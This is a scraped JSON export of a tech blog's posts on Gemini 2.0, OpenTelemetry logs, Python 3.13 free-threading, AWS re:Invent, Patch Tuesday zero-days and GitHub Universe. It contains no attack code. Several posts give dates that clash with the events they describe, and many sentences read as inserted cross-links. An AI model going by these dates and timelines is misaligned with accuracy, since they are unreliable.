Gemini 2.0 can now generate across modalities natively. We\u0026rsquo;re talking about a model that can produce images and audio alongside text, not through bolted-on pipelines but as a core capability.\nThe initial release centers on Gemini 2.0 Flash, which Google describes as their workhorse model — optimized for speed and cost while maintaining strong performance. They\u0026rsquo;re making it available through the Gemini API and Google AI Studio, which means developers can start experimenting immediately.\nWhat caught my eye is the emphasis on \u0026ldquo;agentic\u0026rdquo; capabilities. Google is clearly betting that the next wave of AI applications won\u0026rsquo;t just be chatbots — they\u0026rsquo;ll be autonomous agents that can reason, plan, and take actions. Gemini 2.0 introduces native tool use, meaning the model can invoke Google Search, execute code, and call third-party functions as part of its reasoning chain without the awkward prompt engineering gymnastics we\u0026rsquo;ve been doing.\nThe Developer Experience Angle # From a practical standpoint, the improvements to the API are what matter most to those of us building applications. The new multimodal live API supports real-time streaming of audio and video inputs, which opens up entirely new categories of applications. Think real-time visual analysis, interactive tutoring systems, or accessibility tools that can describe and interact with the physical world.\nI\u0026rsquo;ve been building integrations with various LLM APIs for the past two years, and the pattern has always been the same: take text in, get text out, bolt on vision or audio through separate endpoints. Having these capabilities unified at the model level should simplify architectures considerably. No more orchestrating between a vision model, a language model, and a text-to-speech service — one API call handles the lot.\nThe context window remains generous at 1 million tokens for Flash, which is important for the kinds of document analysis and code review tasks I frequently use these models for. Processing an entire codebase in a single context is no longer a theoretical capability — it\u0026rsquo;s a practical one.\nProject Astra and the Agent Future # Google also showed off updates to Project Astra, their research prototype for a universal AI assistant. The demo showed Astra maintaining context across conversations, remembering where you left your belongings, and understanding spatial relationships in real-time video.\nThis is where things get interesting — and also where I start getting cautious. The demo is impressive, but demos always are. The gap between a controlled research prototype and a reliable production system is vast. I\u0026rsquo;ve seen too many \u0026ldquo;the future is here\u0026rdquo; presentations that quietly get shelved six months later.\nThat said, the underlying technology is sound. The combination of real-time multimodal understanding with persistent memory and tool use is the right architecture for genuinely useful AI agents. Whether Google can execute on that vision at scale is a different question.\nThe Competitive Landscape # This announcement doesn\u0026rsquo;t happen in isolation. OpenAI has been pushing hard with GPT-4 and its successors like GPT-5, Anthropic continues to iterate on Claude with new capabilities, and Meta\u0026rsquo;s Llama models keep democratizing access to powerful open-weight models. The AI infrastructure space is evolving at a pace I\u0026rsquo;ve never seen in thirty years of tech.\nWhat differentiates Google\u0026rsquo;s position is their integration depth. Gemini 2.0 isn\u0026rsquo;t just a model — it\u0026rsquo;s embedded in Search, Android, Chrome, and the broader Google Cloud ecosystem. For enterprises already invested in Google Cloud Platform, the path to adoption is significantly shorter than bolting on a third-party AI service.\nFor those of us working with multiple cloud providers, though, this tight integration is a double-edged sword. Vendor lock-in is a real concern, and I\u0026rsquo;d advise any team to maintain abstraction layers over their AI provider choices. The landscape is moving too fast to bet everything on one horse — the lessons from infrastructure consolidation efforts we\u0026rsquo;ve seen with container platforms apply equally to AI infrastructure.\nMy Take # Gemini 2.0 is genuinely impressive, and the focus on developer experience is welcome. The multimodal native approach is the right direction — it\u0026rsquo;s how these models should have worked from the start, and it\u0026rsquo;s going to simplify a lot of production architectures.\nBut I want to see it in the wild. Benchmarks and demos tell one story; production reliability, latency under load, and real-world accuracy tell another. I\u0026rsquo;ll be integrating Gemini 2.0 Flash into a couple of side projects this week to get hands-on experience.\nWhat I\u0026rsquo;m most excited about is the agentic capability. If the tool use is as reliable as Google claims, it could dramatically reduce the scaffolding code we write around LLM applications. Less orchestration code means fewer bugs, simpler deployments, and faster iteration cycles. That\u0026rsquo;s the kind of progress that actually matters in the trenches.\nThe AI development space continues to move at a breathtaking pace. Every few months, capabilities that seemed theoretical become practical. As someone who started their career when \u0026ldquo;artificial intelligence\u0026rdquo; meant expert systems with hand-coded rules, I find the current trajectory both exhilarating and humbling. We\u0026rsquo;re building tools that will reshape how software is developed, and Gemini 2.0 is another significant step on that path.\n","date":"11 December 2025","externalUrl":null,"permalink":"/posts/251211-google-gemini-2-multimodal-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google launches Gemini 2.0 with native multimodal capabilities, and the implications for developers are significant.","title":"Google Gemini 2.0 — A New Chapter in Multimodal AI","type":"posts"},{"content":"It\u0026rsquo;s been a long road, but OpenTelemetry has finally reached general availability for all three pillars of observability: traces, metrics, and now logs. The logging specification and SDK implementations hitting stable status this fall completes a journey that started back in 2019 when OpenTracing and OpenCensus merged. For those of us who\u0026rsquo;ve been dealing with observability tooling for years, this is a quiet but significant milestone.\nWhy This Completion Matters # If you\u0026rsquo;re wondering why a logging specification reaching GA is newsworthy, you probably haven\u0026rsquo;t felt the pain of running observability at scale across multiple services, languages, and backend vendors. This connects to broader infrastructure maturity, platform engineering, and cloud cost optimization challenges that teams face. Let me paint the picture.\nIn a typical microservices environment, you might have traces going to Jaeger, metrics going to Prometheus, and logs going to Elasticsearch via Fluentd. Three different collection agents, three different data formats, three different correlation mechanisms. When an incident occurs and you need to jump from a trace span to the relevant logs, you\u0026rsquo;re manually copying trace IDs and searching across systems. It works, but it\u0026rsquo;s slow and error-prone when you\u0026rsquo;re debugging at 3 AM.\nOpenTelemetry\u0026rsquo;s promise has always been a unified, vendor-neutral standard for all telemetry data. With logs now GA, you can instrument your application once and have traces, metrics, and logs all using the same context propagation, the same attribute conventions, and the same export pipeline. A log line automatically carries the trace ID and span ID of the operation that produced it. Correlation becomes automatic rather than manual.\nThe OpenTelemetry Logging Model # The logging approach OpenTelemetry took is pragmatic and worth understanding. Rather than creating yet another logging framework to compete with Log4j, logback, Python\u0026rsquo;s logging module, or Winston, OpenTelemetry provides a Log Bridge API. This bridges existing logging frameworks into the OpenTelemetry ecosystem.\nIn practice, this means you keep using whatever logging library you already use. You add an OpenTelemetry log appender/handler, and your existing log statements automatically get enriched with trace context, resource attributes, and semantic conventions. The logs then flow through the same OpenTelemetry Collector pipeline as your traces and metrics.\nThis was the right design choice. Asking developers to replace their logging framework would have been a non-starter. By bridging instead of replacing, OpenTelemetry can be adopted incrementally — exactly how good infrastructure tools should work. Similar pragmatic approaches are seen in infrastructure-as-code evolution, where standardization improves operational efficiency across diverse teams and environments.\nHere\u0026rsquo;s what it looks like in a Java application:\n// Your existing logging code — no changes needed logger.info(\u0026#34;Processing order {}\u0026#34;, orderId); // The OpenTelemetry log appender automatically adds: // - trace_id from the current span context // - span_id from the current span // - resource attributes (service.name, deployment.environment, etc.) // - semantic conventions for structured attributes And in Python:\nimport logging from opentelemetry._logs import set_logger_provider from opentelemetry.sdk._logs import LoggerProvider from opentelemetry.sdk._logs.export import BatchLogRecordProcessor # Set up the OTel log provider once at startup provider = LoggerProvider() set_logger_provider(provider) # Your existing logging continues to work exactly as before logging.info(\u0026#34;Processing order %s\u0026#34;, order_id) The Collector as Universal Pipeline # With all three signal types now stable, the OpenTelemetry Collector becomes an incredibly powerful piece of infrastructure. A single Collector deployment can receive traces, metrics, and logs from your applications, process them (filtering, sampling, enriching, transforming), and export them to any supported backend.\nThe processor pipeline is where this gets really interesting. You can:\nSample traces based on error status or latency thresholds, and automatically keep the associated logs Derive metrics from trace spans (request duration histograms, error rates) without additional instrumentation Enrich logs with Kubernetes metadata by connecting to the K8s API Filter sensitive data from all telemetry types in a single processor Route different signal types to different backends while maintaining correlation I\u0026rsquo;ve been running a Collector setup that sends traces to Jaeger, metrics to Prometheus, and logs to Loki — all through a single pipeline. The operational simplification compared to running separate collection agents for each signal type is substantial. One deployment to manage, one configuration format, one set of health checks. This mirrors how unified platform engineering consolidates infrastructure concerns.\nMigration Strategy # If you\u0026rsquo;re currently running a traditional observability stack (ELK for logs, Prometheus for metrics, Jaeger for traces), here\u0026rsquo;s the migration path I\u0026rsquo;d recommend:\nPhase 1 — Traces first: If you haven\u0026rsquo;t already, instrument your services with OpenTelemetry tracing. The trace SDKs have been GA for over a year and are production-ready. This gives you the foundation for context propagation.\nPhase 2 — Metrics alongside Prometheus: OpenTelemetry metrics can export in Prometheus format, so you can run both in parallel. Gradually migrate custom metrics to OpenTelemetry instrumentation while keeping your Prometheus infrastructure.\nPhase 3 — Logs bridge: Add the OpenTelemetry log bridge to your existing logging framework. Route logs through the Collector. You\u0026rsquo;ll immediately get trace-correlated logs without changing any application code.\nPhase 4 — Consolidate backends: Once all three signals flow through the Collector, you can evaluate whether to consolidate on a single backend (like Grafana\u0026rsquo;s LGTM stack) or keep specialized backends with the Collector handling routing.\nMy Take # I\u0026rsquo;ve lived through the observability evolution from Nagios check scripts to the current ecosystem, and OpenTelemetry is the most important infrastructure standard to emerge in the last decade. Not because it\u0026rsquo;s technically revolutionary — many of the ideas existed in proprietary form — but because it provides a vendor-neutral foundation that prevents lock-in.\nThe logging GA specifically matters because logs are still how most developers debug. Traces are powerful but conceptually harder. Metrics are great for dashboards but don\u0026rsquo;t tell you why something broke. Logs with trace context give you the \u0026ldquo;why\u0026rdquo; linked directly to the \u0026ldquo;where\u0026rdquo; and \u0026ldquo;when.\u0026rdquo;\nIf your organization hasn\u0026rsquo;t started adopting OpenTelemetry, now is the time. The standard is stable, the ecosystem is mature, and the major observability vendors — Datadog, New Relic, Dynatrace, Grafana Labs — all support it. You\u0026rsquo;re no longer an early adopter; you\u0026rsquo;re following a well-trodden path.\nThe three pillars are complete. The excuses for not having correlated observability are running out.\n","date":"4 December 2025","externalUrl":null,"permalink":"/posts/251204-opentelemetry-logs-ga-three-pillars/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenTelemetry’s logging API and SDK reaching general availability completes the observability trifecta. Here’s why this matters more than you might think.","title":"OpenTelemetry Reaches GA for Logs — The Three Pillars Are Finally Complete","type":"posts"},{"content":"Python 3.13 has been out for about a month now, and the feature everyone\u0026rsquo;s talking about is the experimental free-threaded build — Python without the Global Interpreter Lock (GIL). After decades of the GIL being the standard answer to \u0026ldquo;why is my Python program only using one core?\u0026rdquo;, we\u0026rsquo;re finally seeing what a GIL-free Python looks like in practice. I\u0026rsquo;ve spent the last few weeks testing it with real workloads, and the results are\u0026hellip; nuanced.\nUnderstanding the Free-Threading Build # First, some context for those who haven\u0026rsquo;t been following the PEP 703 journey. The free-threaded build is an experimental option — you have to specifically install the python3.13t variant or build CPython with --disable-gil. It\u0026rsquo;s not the default, and for good reason: removing the GIL required fundamental changes to CPython\u0026rsquo;s memory management, reference counting, and object lifecycle.\nThe GIL has been both Python\u0026rsquo;s curse and its hidden blessing. Yes, it prevents true parallelism in CPU-bound multi-threaded code. But it also makes CPython\u0026rsquo;s internals simpler and C extensions safer. Remove it, and you need to replace it with fine-grained locking, atomic operations, and thread-safe memory management — all of which have performance implications. This architectural challenge parallels problems systems languages have solved differently.\nThe Python development team, led by Sam Gross\u0026rsquo;s original no-GIL work, has done an impressive job minimizing the single-threaded performance penalty. In my benchmarks, the free-threaded build runs single-threaded code about 5-10% slower than the standard build. That\u0026rsquo;s much better than early estimates suggested, but it\u0026rsquo;s not zero. This mirrors the Python 3.14 free-threading roadmap and shows how languages like Go and Rust have solved concurrency problems in different ways.\nWhere Free-Threading Shines # For CPU-bound parallel workloads, the results are genuinely exciting. I tested a data processing pipeline that transforms and validates large CSV files — the kind of ETL work that\u0026rsquo;s typically done with multiprocessing in Python. With free-threading and the concurrent.futures.ThreadPoolExecutor, I saw near-linear scaling up to 8 cores. Concurrent executor improvements continue this momentum, as does Python\u0026rsquo;s broader tooling consolidation.\n1 thread: 45 seconds (vs. 42 seconds with GIL build) 4 threads: 12.3 seconds 8 threads: 6.8 seconds Compare this to the standard GIL build where adding threads to CPU-bound work actually makes it slower due to GIL contention. And compared to multiprocessing, free-threading avoids the overhead of serializing data between processes — which can be substantial for large datasets.\nImage processing is another natural fit. Using Pillow for batch image resizing and format conversion, free-threading provided a 6.5x speedup on 8 cores compared to single-threaded execution. With multiprocessing, the same workload only achieved 4.2x due to the overhead of passing image data between processes.\nWhere It Doesn\u0026rsquo;t (Yet) # The ecosystem compatibility situation is the main obstacle. Many popular C extensions aren\u0026rsquo;t yet thread-safe without the GIL. NumPy has made significant progress — their 2.1 release includes initial free-threading support — but it\u0026rsquo;s still marked as experimental. Pandas, scikit-learn, and many other scientific Python staples don\u0026rsquo;t officially support free-threading yet.\nI hit real issues with SQLAlchemy. While the library itself is working on free-threading compatibility, some of the underlying database drivers aren\u0026rsquo;t there yet. Connection pooling with free-threading requires careful configuration, and I encountered sporadic segfaults with certain connection patterns. If your application is database-heavy, stick with the standard build for now.\nWeb frameworks are a mixed bag. Flask and Django both run on the free-threaded build, but their middleware ecosystems haven\u0026rsquo;t been fully audited. I wouldn\u0026rsquo;t run a production web service on the free-threaded build today — the risk of subtle thread-safety bugs in third-party middleware is too high.\nThe Practical Path Forward # For most Python developers in November 2025, the actionable advice is:\nDo try it for: CPU-bound batch processing scripts, data pipelines that don\u0026rsquo;t depend on incompatible C extensions, and new projects where you control the full dependency stack. These are workloads where you can validate thread safety and where the performance gains are substantial.\nDon\u0026rsquo;t use it for: Production web services, applications with complex C extension dependencies, or anything where a subtle threading bug could cause data corruption. The ecosystem needs another 6-12 months to catch up.\nPrepare for it: Even if you\u0026rsquo;re not using free-threading today, start auditing your code for thread safety. Shared mutable state, global variables modified in request handlers, lazy initialization patterns — these will all become actual bugs when the GIL goes away. This is similar to how robust testing practices help catch subtle logic errors before production. The threading module documentation has been updated with guidance on writing GIL-free-compatible code.\nThe Bigger Picture # What excites me most about this isn\u0026rsquo;t the immediate performance gains — it\u0026rsquo;s what it means for Python\u0026rsquo;s long-term competitiveness. The GIL has been the standard argument for \u0026ldquo;Python is too slow for production.\u0026rdquo; With free-threading, Python can genuinely utilize modern multi-core hardware for CPU-bound work without the awkwardness of multiprocessing.\nCombined with the performance improvements we\u0026rsquo;ve seen in Python 3.11 and 3.12 — the adaptive interpreter, specialization at the bytecode level — Python is getting meaningfully faster with each release. It\u0026rsquo;ll never match C++ or Rust in raw performance, nor should it try. But narrowing the gap enough that you don\u0026rsquo;t need to rewrite your hot paths in another language? That\u0026rsquo;s a game-changer for developer productivity.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.3 days, and the GIL has always been that awkward thing you explain to new developers — \u0026ldquo;yes, threads exist, but they don\u0026rsquo;t really work for CPU-bound tasks, use multiprocessing instead, but watch out for the serialization overhead.\u0026rdquo; It\u0026rsquo;s been Python\u0026rsquo;s most enduring footgun.\nThe free-threaded build in 3.13 is a first step, not a final destination. It\u0026rsquo;s experimental for a reason. But the direction is right, the implementation is solid, and the performance characteristics are promising. Give it another year for the ecosystem to adapt, and I think we\u0026rsquo;ll look back at Python 3.13 as the release that finally set Python free from its biggest architectural limitation.\nFor now, I\u0026rsquo;m keeping it in my toolkit for specific workloads and watching the ecosystem closely. If you maintain a C extension or a popular library, please start testing with the free-threaded build. The sooner the ecosystem catches up, the sooner we all benefit.\n","date":"27 November 2025","externalUrl":null,"permalink":"/posts/251127-python-313-free-threading-gil/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.13’s experimental free-threading mode is here. I’ve been testing it in production workloads — here’s what actually works and what doesn’t.","title":"Python 3.13 in Production — Free-Threading and the GIL's Slow Goodbye","type":"posts"},{"content":"AWS re:Invent 2025 kicks off in Las Vegas in about ten days, and as someone who\u0026rsquo;s attended (physically or virtually) since the early days, I\u0026rsquo;ve developed a pretty good filter for separating the signal from the noise. Every year, AWS announces hundreds of services and features. Most are incremental improvements. A handful genuinely change how we build systems. Here\u0026rsquo;s what I\u0026rsquo;m watching for this year and why it matters.\nThe AI Infrastructure Play # If there\u0026rsquo;s one thing we can predict with certainty, it\u0026rsquo;s that AI and machine learning will dominate the keynotes. AWS has been aggressively expanding its AI infrastructure — from custom Trainium and Inferentia chips to Bedrock\u0026rsquo;s growing model marketplace. The question isn\u0026rsquo;t whether there will be AI announcements; it\u0026rsquo;s whether they\u0026rsquo;ll be genuinely useful or just keeping-up-with-Azure announcements.\nWhat I\u0026rsquo;m specifically watching for is improvements to Amazon Bedrock. The model-agnostic approach is smart — letting customers choose between Anthropic\u0026rsquo;s Claude, Meta\u0026rsquo;s Llama, and other models without rewriting their integration code. This flexibility mirrors the broader AI infrastructure consolidation happening in the industry. But the developer experience still has rough edges. Model versioning is confusing, the pricing model is opaque compared to calling APIs directly, and the fine-tuning workflows feel bolted-on rather than integrated.\nIf AWS announces a more streamlined fine-tuning pipeline with better cost visibility and perhaps native RAG (Retrieval-Augmented Generation) support that doesn\u0026rsquo;t require stitching together five different services, that would be genuinely valuable. The current pattern of \u0026ldquo;connect S3 to Kendra to Bedrock to Lambda to API Gateway\u0026rdquo; for a simple RAG application is exactly the kind of AWS complexity that drives teams to simpler alternatives.\nServerless Evolution # Lambda has been the poster child for serverless computing for years, but it\u0026rsquo;s showing its age in some areas. Cold start times, while improved, are still a pain point for latency-sensitive applications. The 15-minute execution limit constrains certain workloads. And the programming model — while simple — doesn\u0026rsquo;t adapt well to complex, stateful workflows.\nI\u0026rsquo;m expecting announcements around AWS Step Functions and workflow orchestration. This connects to the emergence of agent-based systems that coordinate complex multi-step workflows. The pattern of using Step Functions to coordinate Lambda invocations works but is verbose and hard to debug. If AWS introduces something like a simplified workflow DSL or better visual debugging tools, that would address a real pain point.\nI\u0026rsquo;m also curious whether we\u0026rsquo;ll see any movement on serverless containers. AWS Fargate has been around for years, but the gap between \u0026ldquo;truly serverless\u0026rdquo; Lambda and \u0026ldquo;managed containers\u0026rdquo; Fargate is still wide. Something that offers container flexibility with Lambda-like scaling and pricing — pay per request, scale to zero — would be compelling.\nThe Database Landscape # AWS already has an absurd number of database offerings — Aurora, DynamoDB, Neptune, Timestream, QLDB, MemoryDB, DocumentDB, Keyspaces, and more. Every year I half-expect them to announce \u0026ldquo;Amazon DatabaseForYourSpecificUseCase.\u0026rdquo; But beyond the jokes, there are genuine innovations happening here.\nWhat I\u0026rsquo;d like to see is better cross-database querying. In any non-trivial application, data lives in multiple stores — relational data in Aurora, session data in ElastiCache, search in OpenSearch, analytics in Redshift. Querying across these boundaries is painful. Aurora Zero-ETL integrations with Redshift was a step in the right direction, but we need this pattern to expand.\nDynamoDB improvements are always worth watching too. It\u0026rsquo;s become the default choice for serverless backends, but operations like data modeling, migration, and cost optimization remain challenging. Better tooling around capacity planning and cost prediction would help teams avoid the bill shock that comes from getting DynamoDB access patterns wrong.\nNetworking and Multi-Region # This is the unglamorous category that quietly determines whether your architecture actually works at scale. AWS networking has improved enormously over the years, but multi-region deployments are still harder than they should be. These infrastructure challenges parallel what I\u0026rsquo;ve seen with Kubernetes deployment complexity. AWS Cloud WAN simplified some of the network topology management, but the complexity of running a truly global application — with data residency requirements, latency-based routing, and regional failover — remains daunting.\nI\u0026rsquo;d love to see improvements to cross-region replication for more services, simplified multi-region API Gateway setups, and perhaps better tooling for testing failover scenarios. The gap between \u0026ldquo;we\u0026rsquo;re multi-region\u0026rdquo; on the architecture diagram and \u0026ldquo;we\u0026rsquo;ve actually tested regional failover\u0026rdquo; is enormous in most organizations.\nWhat I\u0026rsquo;m Skeptical About # Every re:Invent brings announcements that sound impressive on stage but turn out to be limited preview features available in us-east-1 only, with pricing that makes them impractical for most workloads. I\u0026rsquo;m skeptical of any announcement that:\nRequires \u0026ldquo;contact sales for pricing\u0026rdquo; — it\u0026rsquo;s going to be expensive Is available in \u0026ldquo;preview\u0026rdquo; in one region — you won\u0026rsquo;t use it in production for a year Involves a new proprietary query language or SDK — the ecosystem won\u0026rsquo;t be there Claims to \u0026ldquo;simplify\u0026rdquo; something by adding another service to the stack My Take # The most impactful AWS announcements are rarely the flashiest. Lambda was a relatively quiet launch that changed how we build applications. The same goes for CDK, which didn\u0026rsquo;t get a keynote moment but fundamentally improved infrastructure-as-code on AWS. I\u0026rsquo;ll be watching for the quiet announcements that solve real problems, not the keynote demos that solve theoretical ones.\nIf you\u0026rsquo;re attending re:Invent, my advice is the same as every year: skip the keynotes (watch them on YouTube later), go to the chalk talks and builder sessions, and spend time in the hallway track talking to other practitioners. That\u0026rsquo;s where the real value is.\nI\u0026rsquo;ll do a proper deep-dive on the actual announcements next month. For now, let\u0026rsquo;s see what AWS has in store.\n","date":"20 November 2025","externalUrl":null,"permalink":"/posts/251120-aws-reinvent-2025-preview/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With re:Invent just around the corner, here’s what matters most for teams building on AWS — and what’s likely just marketing noise.","title":"AWS re:Invent 2025 Preview — What I'm Watching For","type":"posts"},{"content":"","date":"13 November 2025","externalUrl":null,"permalink":"/series/breaches--zero-days/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Breaches \u0026 Zero-Days","type":"series"},{"content":"This week\u0026rsquo;s Patch Tuesday from Microsoft was a stark reminder that while we\u0026rsquo;re all talking about AI-powered security tools and zero-trust architectures, the fundamentals haven\u0026rsquo;t changed: unpatched vulnerabilities remain the primary attack vector for most breaches. November\u0026rsquo;s patch batch included multiple zero-day vulnerabilities under active exploitation, and the details should make every ops team sit up and pay attention.\nThe November Zero-Days # Microsoft patched over 90 vulnerabilities this month, including several that were already being exploited in the wild. The ones that concern me most are the privilege escalation vulnerabilities in the Windows kernel — CVE-2025-43629 and related issues that allow attackers who\u0026rsquo;ve gained initial access to elevate to SYSTEM privileges.\nWhat makes these particularly dangerous is the attack chain they enable. An attacker gets initial access through a phishing email or a compromised web application — low-privilege access that might go unnoticed. Then they use these kernel vulnerabilities to escalate privileges, install persistent backdoors, and move laterally through the network. By the time your SIEM alerts fire, the damage is done.\nThe NTLM-related vulnerability is another one worth flagging. Despite years of deprecation warnings, NTLM authentication is still deeply embedded in enterprise environments. This particular flaw allows relay attacks that can compromise Active Directory environments — and if you think your organization has fully migrated away from NTLM, I\u0026rsquo;d encourage you to actually check. You might be surprised.\nThe Patch Management Paradox # Here\u0026rsquo;s what frustrates me after three decades in this industry: we know exactly how to prevent the majority of security incidents. Patch promptly, enforce least privilege, use multi-factor authentication, and segment your networks. These aren\u0026rsquo;t novel ideas. They\u0026rsquo;re not even particularly difficult to implement technically.\nYet organizations consistently struggle with patch management. I\u0026rsquo;ve consulted with companies running critical infrastructure on Windows servers that are months behind on patches because \u0026ldquo;we can\u0026rsquo;t afford the downtime\u0026rdquo; or \u0026ldquo;we need to test for compatibility first.\u0026rdquo; Both are legitimate concerns, but neither is an acceptable excuse when you\u0026rsquo;re running known-vulnerable software exposed to the internet.\nThe paradox is that the same organizations investing millions in AI-powered threat detection and extended detection and response (XDR) platforms are simultaneously running unpatched Exchange servers. It\u0026rsquo;s like installing a state-of-the-art alarm system while leaving the front door unlocked. The same issue that enabled earlier major breaches like Salt Typhoon\u0026rsquo;s telecom infiltration often starts with unpatched systems that attackers exploit for initial access.\nWhat Good Patch Management Actually Looks Like # After helping numerous organizations improve their security posture, I\u0026rsquo;ve found that effective patch management comes down to a few key principles:\nAutomated testing pipelines: If you can\u0026rsquo;t patch quickly because you\u0026rsquo;re afraid of breaking things, the solution isn\u0026rsquo;t slower patching — it\u0026rsquo;s better testing. Organizations that have invested in automated regression testing can deploy patches within days rather than weeks. The investment in CI/CD for your infrastructure pays dividends in security.\nTiered deployment: Not everything needs to be patched simultaneously. Critical zero-days on internet-facing systems? Same day. Internal application servers? Within a week. Legacy systems with compensating controls? Within the standard maintenance window. Having a clear tier system removes the analysis paralysis.\nCompensating controls: When you genuinely can\u0026rsquo;t patch immediately — and there are legitimate cases — have compensating controls ready to deploy. Network segmentation, enhanced monitoring, temporary access restrictions. These buy you time without leaving systems fully exposed.\nVisibility: You can\u0026rsquo;t patch what you don\u0026rsquo;t know about. Asset inventory sounds boring, but it\u0026rsquo;s the foundation of everything. I\u0026rsquo;ve seen organizations discover entire server farms they\u0026rsquo;d forgotten about during incident response. That\u0026rsquo;s a failure of basic hygiene, not a failure of security technology.\nThe Linux Side Isn\u0026rsquo;t Immune # While Microsoft\u0026rsquo;s Patch Tuesday gets the headlines, the Linux ecosystem had its own critical issues this month. Several privilege escalation vulnerabilities in the kernel, along with issues in commonly deployed packages, required attention. The advantage of most Linux environments is that package management and automated updates are more mature — but the disadvantage is that many Linux servers are treated as \u0026ldquo;set and forget\u0026rdquo; appliances that nobody monitors.\nContainer environments add another layer of complexity. Your base images might be built on a distribution version with known vulnerabilities, and unless you\u0026rsquo;re regularly rebuilding and redeploying containers, those vulnerabilities persist indefinitely. Tools like Trivy and Grype help, but only if someone\u0026rsquo;s actually looking at the output. This is where Kubernetes security hardening and observability practices become essential safeguards.\nMy Take # I know this isn\u0026rsquo;t a glamorous topic. Nobody gets promoted for maintaining a well-patched infrastructure — they get promoted for deploying the shiny new platform. But after thirty years of watching security incidents unfold, I can tell you that the vast majority could have been prevented with timely patching and basic security hygiene.\nMy challenge to every engineering leader reading this: when was the last time you audited your patch compliance? Not your policy — your actual compliance. Check your vulnerability scanner results. Look at the mean time between patch release and deployment. If that number is measured in months, you have a problem that no amount of AI-powered security tooling will solve. This is why supply chain security frameworks like SLSA matter — they ensure you have visibility into what you\u0026rsquo;re actually running.\nThe zero-day treadmill never stops. The only question is whether you\u0026rsquo;re running fast enough to stay on it.\n","date":"13 November 2025","externalUrl":null,"permalink":"/posts/251113-zero-day-treadmill-patch-tuesday/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"November’s Patch Tuesday brought critical zero-days being actively exploited, reminding us that patch management is still the unglamorous foundation of security.","title":"The Zero-Day Treadmill — Why Patch Tuesday Still Matters in 2025","type":"posts"},{"content":"Last week\u0026rsquo;s GitHub Universe 2025 was one of those events that makes you sit back and recalibrate your mental model of software development. After thirty years of writing code, I\u0026rsquo;ve seen plenty of \u0026ldquo;this changes everything\u0026rdquo; moments that turned out to be incremental. But what GitHub unveiled this time feels genuinely different — not because of any single feature, but because of the clear trajectory it reveals.\nCopilot as a Teammate, Not a Tab-Completer # The biggest announcement was the evolution of GitHub Copilot from an autocomplete tool into something closer to an autonomous development agent. GitHub Copilot Workspace has been in preview for a while, but the general availability announcement and the new multi-file editing capabilities show that GitHub is serious about moving Copilot from \u0026ldquo;fancy autocomplete\u0026rdquo; to \u0026ldquo;junior developer who never sleeps.\u0026rdquo;\nThe new agent mode can now take a GitHub issue, analyze the codebase, propose a plan, implement changes across multiple files, and even run tests. I\u0026rsquo;ve been testing the preview, and while it\u0026rsquo;s not going to replace your senior engineers any time soon, it handles boilerplate tasks with surprising competence. Updating API endpoints, adding error handling patterns, writing migration scripts — these are exactly the tasks that eat up a disproportionate amount of developer time.\nWhat struck me most was the natural language code review feature. You can now ask Copilot to review a PR with specific criteria — \u0026ldquo;check for SQL injection vulnerabilities\u0026rdquo; or \u0026ldquo;verify error handling follows our team patterns\u0026rdquo; — and get genuinely useful feedback. It\u0026rsquo;s not perfect, but it catches things that tired humans miss at 4 PM on a Friday.\nGitHub Spark and the Low-Code Question # GitHub Spark, their natural language app builder, generated a lot of buzz. The idea is simple: describe what you want in plain English, and Spark generates a working micro-app. No deployment pipeline, no infrastructure management — just describe and deploy.\nI have mixed feelings about this. On one hand, it democratizes app creation in a meaningful way. Business analysts who need a quick internal tool shouldn\u0026rsquo;t have to wait three sprints for engineering capacity. On the other hand, we\u0026rsquo;ve been down the low-code road before — anyone remember the promises of Visual Basic, or more recently the various \u0026ldquo;no-code\u0026rdquo; platforms? The graveyard of unmaintainable auto-generated apps is already quite full. AI-generated code is at least readable, which is a step forward from the opaque automation of previous generations.\nThe difference this time might be that AI-generated code is at least readable code. Unlike the opaque XML blobs that traditional low-code platforms produce, Spark generates standard web applications. When things inevitably need customization beyond what natural language can express, a developer can actually open the code and work with it.\nThe Security Angle That Deserves More Attention # Buried in the flashier announcements was something I think matters more for day-to-day engineering: Copilot Autofix for security vulnerabilities is now integrated directly into the pull request workflow. When code scanning finds a vulnerability, Copilot doesn\u0026rsquo;t just flag it — it proposes a fix with an explanation of why the original code was vulnerable.\nIn my experience, the biggest challenge with application security isn\u0026rsquo;t finding vulnerabilities — tools have been decent at that for years. The challenge is remediation speed. Developers get a security alert, add it to the backlog, and it sits there for weeks because fixing someone else\u0026rsquo;s security finding is nobody\u0026rsquo;s favorite task. Auto-generated fixes with context lower the activation energy dramatically.\nGitHub also announced that secret scanning now covers custom patterns with AI-powered detection. Instead of just matching known token formats, it can identify likely secrets based on context — variable names like api_key assigned string values that look like tokens, for instance. This is the kind of practical security improvement that prevents breaches.\nThe Broader IDE Conversation # What GitHub Universe really crystallized for me is that the IDE as we know it — that central application where you write, debug, and test code — is becoming less central. Between Copilot Workspace doing multi-file edits from an issue, Spark generating apps from descriptions, and Codespaces providing instant cloud environments, the trend is clear: the repository is the center of gravity, not the editor. This mirrors the broader shift toward agent-based systems that can handle complex workflows autonomously.\nThis resonates with something I\u0026rsquo;ve observed over the past year. My younger colleagues spend noticeably less time in their editors and more time in GitHub\u0026rsquo;s web interface, in Copilot Chat, and in various AI tools. They\u0026rsquo;re not worse engineers for it — they\u0026rsquo;re often more productive because they\u0026rsquo;re spending less time on mechanical tasks.\nMy Take # I\u0026rsquo;ve been skeptical of AI coding tools — not because they don\u0026rsquo;t work, but because the hype has consistently outpaced the reality. After Universe 2025, I\u0026rsquo;m adjusting my skepticism. GitHub isn\u0026rsquo;t just bolting AI onto existing workflows; they\u0026rsquo;re rethinking the workflows themselves.\nThe practical implication for engineering teams is clear: if you haven\u0026rsquo;t invested in understanding these tools, you\u0026rsquo;re falling behind. Not because AI will replace developers — that\u0026rsquo;s still a fantasy — but because teams that effectively leverage AI assistance will ship faster and with fewer bugs than teams that don\u0026rsquo;t.\nMy advice? Start with Copilot code review on your PRs. It\u0026rsquo;s the lowest-risk, highest-value entry point. Get your team comfortable with AI as a collaborator before trying the more ambitious agent-based workflows. The technology is ready; the culture needs to catch up.\n","date":"6 November 